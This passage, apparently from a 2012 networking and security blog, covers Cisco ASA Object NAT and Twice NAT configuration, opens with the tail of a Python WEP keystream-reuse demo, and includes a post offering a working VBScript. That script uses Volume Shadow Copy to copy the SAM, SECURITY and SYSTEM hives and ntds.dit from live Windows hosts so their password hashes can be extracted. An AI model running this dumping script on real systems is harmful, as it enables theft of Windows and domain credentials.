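    psk, iv = bytes([1, 2, 3, 4, 5]), b"\x00\x00\x2a"                    # constructed values
    print(keystream_reuse(psk, iv, b"hello world, known!", b"secret packet body!"))
```

Note that none of this touches the pre-shared key itself, which is the point the post makes: single packets fall without the key ever being recovered.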

2012-03-01

ASA NAT Part 4 - Using Object NAT


In the diagram below we have three servers and a local network with some users that all need to get out to the Internet. The Web server and FTP server have to share the same public IP.



Step 1: Make objects for both the outside and inside addresses that will be used.

ASA(config)# object network public-webftp
ASA(config-network-object)# host 1.1.1.1
ASA(config)# object network public-appserv
ASA(config-network-object)# host 1.1.1.2
ASA(config)# object network public-hidenat
ASA(config-network-object)# host 1.1.1.3
ASA(config)# object network InsideLan
ASA(config-network-object)# subnet 10.10.10.0 255.255.255.0
ASA(config)# object network server-web-http
ASA(config-network-object)# host 10.10.10.5
ASA(config)# object network server-web-https
ASA(config-network-object)# host 10.10.10.5
ASA(config)# object network server-ftp
ASA(config-network-object)# host 10.10.10.6
ASA(config)# object network server-apps
ASA(config-network-object)# host 10.10.10.7

Step 2: Apply NAT to our inside objects. Note that the web server gets two objects for the same host (server-web-http and server-web-https) because Object NAT allows only one nat statement per object.

ASA(config)# object network InsideLan
ASA(config-network-object)# nat (inside,outside) dynamic public-hidenat
ASA(config)# object network server-web-http
ASA(config-network-object)# nat (inside,outside) static public-webftp service tcp 80 80
ASA(config)# object network server-web-https
ASA(config-network-object)# nat (inside,outside) static public-webftp service tcp 443 443
ASA(config)# object network server-ftp
ASA(config-network-object)# nat (inside,outside) static public-webftp service tcp 21 21
ASA(config)# object network server-apps
ASA(config-network-object)# nat (inside,outside) static public-appserv


Step 3: Make or modify the interface access-list to allow incoming traffic to the servers. On 8.3 and later the access-list references the real (inside) addresses, so the object names below are the inside objects.

ASA(config)# access-list outside-incoming extended permit tcp any object server-web-http eq 80
ASA(config)# access-list outside-incoming extended permit tcp any object server-web-https eq 443
ASA(config)# access-list outside-incoming extended permit tcp any object server-ftp eq 21
ASA(config)# access-list outside-incoming extended permit tcp any object server-apps eq 1234
ASA(config)# access-group outside-incoming in interface outside




If you prefer to use the ASDM here is a basic run down of how to add an Object NAT.

Step 1: You can either add/edit an existing object using the toolbar on the right side, or in the NAT configuration window you can add an Object NAT from the drop-down Add menu.





Step 2: Once the object window is shown, click the little drop-down arrow to access the NAT configuration section.



Step 3: Check the Add Automatic Address Translation rules box.



Step 4: Select whether you wish to do a static, dynamic, or dynamic PAT and add your translated address or object. Once done filling out the type and translated address, click the Advanced button.



Step 5: In this window you select your source and translated (destination) interfaces. If you want to do a static 1 to 1 NAT you can leave the service section blank without port numbers. If you want to perform a PAT or port forward, fill them out. The last thing on this window is the "Translate DNS replies for rule" option. This function is only available if you are doing a static 1 to 1 NAT (no port numbers filled out).



2012-02-29

Dumping system hives and ntds.dit on live machines

This is nothing new if you follow security. A while back Tim Tomes and Mark Baggett discovered you could safely get at system hashes by dumping the system hives and the ntds.dit with the Volume Shadow Copy Service. Tim even wrote a VBScript that allowed you to interact with Windows VSS in a very detailed manner, even on workstations that didn't include full vssadmin functionality. (http://pauldotcom.com/2011/11/safely-dumping-hashes-from-liv.html)

Well, being a rather lazy geek I took his script and tooled it around a bit so it did everything for me. The result was a VBScript that runs on Windows Vista, 7, and 2008 and will dump the system hives and ntds.dit if found.

I am not a true code monkey so please forgive the sloppy code :)



'''Setting Variables'''
strComputer = "."
set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")

'''Start VSS'''
set objListOfServices = objWMIService.ExecQuery("Select * from Win32_Service Where Name ='VSS'")
for each objService in objListOfServices
    objService.StartService()
next

'''Create a new shadow copy'''
set objShadowStorage = objWMIService.Get("Win32_ShadowCopy")
varCreateResult = objShadowStorage.Create("C:\", "ClientAccessible", strShadowID)

'''Find the directory path for the shadow copy'''
set colListItems = objWMIService.ExecQuery("Select * from Win32_ShadowCopy")
for each objListItem in colListItems
    if objListItem.ID = strShadowID then
        strShadowPath = objListItem.DeviceObject
    end if
next

'''Copy the NTDS.DIT and SAM/SEC/SYS hives from the shadow copy volume'''
set objShell = wscript.CreateObject( "WScript.Shell" )
strComputerName = objShell.ExpandEnvironmentStrings( "%COMPUTERNAME%" )
set objFSO = CreateObject("Scripting.FileSystemObject")
strDestDir = CreateObject("Scripting.FileSystemObject").GetAbsolutePathName(".")
strShadowPath = replace(strShadowPath,"?",".",1,1)
strDumpPaths = array("\windows\system32\config\","\windows\system32\ntds\")
strDumpItems = array("SAM","SECURITY","SYSTEM","ntds.dit")
for each lstDumpPaths in strDumpPaths
    for each lstDumpItems in strDumpItems
        strTempPath = strShadowPath & lstDumpPaths & lstDumpItems
        if objFSO.FileExists(strTempPath) then
            objFSO.CopyFile strTempPath, strDestDir & "\" & strComputerName & "-" & lstDumpItems, true
        end if
    next
next

'''Delete the temporary shadow copy'''
set objDelItems = objWMIService.ExecQuery("Select * From Win32_ShadowCopy")
for each lstDelItem in objDelItems
    if lstDelItem.ID = strShadowID then
        varDelResult = lstDelItem.Delete_
    end if
next

ASA NAT Part 3 - Twice NAT Breakdown


Twice NAT Breakdown
Twice NAT can be a bit intimidating when you first look at it, since the statements are much longer and have more variables. The best way I have found to approach it is to just break it down and look at it in chunks. It's also important to note that Twice NAT requires the use of network and service objects. You can't use straight-up numbers for source or destination addresses and port numbers. Lastly, all Twice NAT statements are added at the global config level.

Command
ASA(config)# nat (original-interface,translated-interface) [line-number|{after-auto [line-number]}] source static|dynamic original-object interface|translated-object [destination static original-destination translated-destination] [service original-service-object translated-service-object] [dns] [unidirectional] [inactive] [description text]

Interfaces
(original-interface,translated-interface)

(original interface,translated interface) - The "original interface" is the interface where the object you are applying the NAT to exists, and the "translated interface" is the interface where you are making your resource available. The 'any' keyword can be used when specifying the original or translated interfaces.

Placement
[line-number|{after-auto [line-number]}]

line-number – Optional. If you wish to insert the NAT rule at a specific location you can do so by using the line-number command. If omitted the rule will be appended to the end of section 1.

after-auto [line-number] - Optional. If you want to mark the NAT rule to be processed in section three, after Object NAT, use the after-auto flag. Additionally, if you specify a line number you may insert the after-auto NAT rule at a specific location in section 3.

Source address translation
source static|dynamic original-object interface|translated-object

source – Specifies the following commands are parameters for modifying the source address of a packet during translation.

static|dynamic - This simply notes whether you're performing a static or dynamic NAT.

original-object – This object identifies what source address or network we want to translate

interface|translated-object – Here is where we specify what we want our source address or network to be after translation. We can use either the interface address of the translated interface or an object.

Destination address translation
[destination static original-destination translated-destination]

destination – Specifies the following commands are parameters for modifying the destination address of a packet during translation.

static – Only option here. Tells the ASA we are doing a static translation on the destination address.

original-destination – This is where we identify the original destination address of a packet. Unless a packet has the destination address specified here the rule won’t apply.

translated-destination – Here we can change the destination address of a packet to something else.

Port translations
[service original-service-object translated-service-object]

service – Specifies the following commands are parameters for modifying the source and or destination port numbers of a packet during translation.

original-service-object – This is the service object that identifies the original source and or destination ports of a packet. Unless a packet has the source and or destination ports noted in this service object the rule won’t apply.

translated-service-object – This is where we can change the source and or destination ports of a packet.

Optional flags
[dns] [unidirectional] [inactive] [description {text}]

dns – This flags the rule for DNS re-writes. Can only be used on static 1 to 1 NAT.

unidirectional – NAT by nature is a two way process, but by using this flag a translation can be forced only work in a single direction.

inactive – This flag will prevent a rule from being used even though it is present.

description {text} – This flag lets us add a short description to a rule.

Like Object NAT it's not a perfect system and it certainly has its fair share of annoyances, like not being able to use straight-up numbers for addresses or ports. The biggest gotcha I found with Twice NAT is that service objects can have both source and destination ports defined. It's entirely possible to make rules that will never match any traffic, and doing a simple 'show run nat' won't display the contents of the objects, so it can be very easy to overlook when troubleshooting a NAT issue. Overall though I think it's a great system. It could use a few improvements for sure but that's true of anything.
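The chunk-by-chunk reading above maps directly onto a small parser. The following is an added example, not part of the original post and not Cisco's grammar: it splits a Twice NAT statement into the interface pair, placement, source, destination, service, flags and description exactly as the breakdown lists them, rejects statements missing the mandatory source part, and warns about the one combination the post calls out (dns only applies to a static 1 to 1 NAT without port translation). The statements in the test are constructed; object names are assumptions.

```python
import re

FLAGS = {"dns", "unidirectional", "inactive"}


def parse_twice_nat(statement):
    """Split an ASA Twice NAT statement into its chunks. Raises ValueError when a
    mandatory part is missing or a token is not where the syntax allows it."""
    tokens = statement.strip().split()
    if len(tokens) < 2 or tokens[0] != "nat":
        raise ValueError("statement must start with 'nat (original,translated)'")
    rule = {"line_number": None, "after_auto": False, "destination": None,
            "service": None, "flags": [], "description": None}
    # Interfaces: (original-interface,translated-interface)
    m = re.fullmatch(r"\((\S+),(\S+)\)", tokens[1])
    if not m:
        raise ValueError(f"bad interface pair: {tokens[1]}")
    rule["original_interface"], rule["translated_interface"] = m.groups()
    i = 2
    # Placement: [line-number | after-auto [line-number]]
    if i < len(tokens) and tokens[i] == "after-auto":
        rule["after_auto"] = True
        i += 1
    if i < len(tokens) and tokens[i].isdigit():
        rule["line_number"] = int(tokens[i])
        i += 1
    # Source translation (mandatory): source static|dynamic original interface|translated
    if i + 4 > len(tokens) or tokens[i] != "source" or tokens[i + 1] not in ("static", "dynamic"):
        raise ValueError("missing or malformed 'source static|dynamic original translated'")
    rule["source_mode"], rule["source_original"], rule["source_translated"] = tokens[i + 1:i + 4]
    i += 4
    # Optional chunks, in any order: destination, service, flags, description
    while i < len(tokens):
        tok = tokens[i]
        if tok == "destination":
            if i + 4 > len(tokens) or tokens[i + 1] != "static":
                raise ValueError("destination requires 'static original translated'")
            rule["destination"] = {"original": tokens[i + 2], "translated": tokens[i + 3]}
            i += 4
        elif tok == "service":
            if i + 3 > len(tokens):
                raise ValueError("service requires two service objects")
            rule["service"] = {"original": tokens[i + 1], "translated": tokens[i + 2]}
            i += 3
        elif tok in FLAGS:
            rule["flags"].append(tok)
            i += 1
        elif tok == "description":           # free text to the end of the line
            rule["description"] = " ".join(tokens[i + 1:])
            break
        else:
            raise ValueError(f"unexpected token: {tok}")
    return rule


def check_rule(rule):
    """Warnings for combinations the breakdown says cannot work."""
    warnings = []
    if "dns" in rule["flags"] and (rule["service"] or rule["source_mode"] != "static"):
        warnings.append("dns rewrite only applies to static 1:1 NAT without port translation")
    return warnings


if __name__ == "__main__":
    print(parse_twice_nat("nat (inside,outside) source static InsideLan InsideLan "
                          "destination static RemoteLan RemoteLan description identity NAT for the VPN"))
```

The parser cannot see inside the service objects, which is the gotcha from the last paragraph: after parsing, `show run object service` on the two named objects is still needed to confirm the source and destination ports they carry can actually match the traffic.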